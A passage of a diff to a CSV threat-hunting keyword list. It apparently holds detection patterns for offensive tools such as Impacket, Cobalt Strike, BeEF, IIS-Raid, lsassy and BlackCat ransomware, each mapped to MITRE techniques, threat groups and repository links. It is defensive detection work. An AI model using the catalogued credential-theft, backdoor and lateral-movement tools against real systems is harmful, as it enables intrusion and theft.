security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ie_win_fakenotification-clippy*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*ie_win_htapowershell.*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*ie_win_missingflash-prettytheft*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*IERMTCBpbnRvIHByb2Nlc3MgOiA=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" -"*If the attack is successful* you will see authentication logs of machines retrieving and executing the malicious GPO*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" +"*If the attack is successful* you will see authentication logs of machines retrieving and executing the malicious GPO*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" "*IIS-Backdoor.*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - 
TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" "*IIS-Raid-master*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" "*iisreset.exe /stop*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ikeforce.py*","offensive_tool_keyword","IKEForce","IKEForce is a command line IPSEC VPN brute forcing tool for Linux that allows group name/ID enumeration and XAUTH brute forcing capabilities.","T1110 - T1201 - T1018","TA0001 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/SpiderLabs/ikeforce","1","1","N/A","N/A","3","226","73","2019-09-18T09:35:41Z","2014-09-12T01:11:00Z" -"*ikescan2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ikescan2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*ILBypass.ps1*","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*imapattack.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*imapattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*imapattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*imaprelayclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*imaprelayclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*imaprelayclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*imp_Badger*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. 
The library provides a set of tools as examples of what can be done within the context of this library","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-* *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-*.tar.gz*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. 
The library provides a set of tools as examples of what can be done within the context of this library","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-* *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-*.tar.gz*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*impacket.*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*impacket.*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" -"*'impacket.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket.git*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket.ldap*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket.ntlm*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*'impacket.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket.git*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket.ldap*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket.ntlm*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*impacket.smbconnection*","offensive_tool_keyword","smbcrawler","SmbCrawler is a tool that takes credentials and a list of hosts and crawls through those shares","T1077 - T1021 - T1110 - T1083","TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement - Collection","https://github.com/SySS-Research/smbcrawler","1","1","N/A","N/A","2","129","13","2023-05-14T06:48:40Z","2021-06-09T19:27:08Z" -"*impacket/*.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket:latest*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket__init__*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket_findDelegation*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*impacket_rpcdump_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*impacket-atexec*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-dcomexec*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacketfile.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential 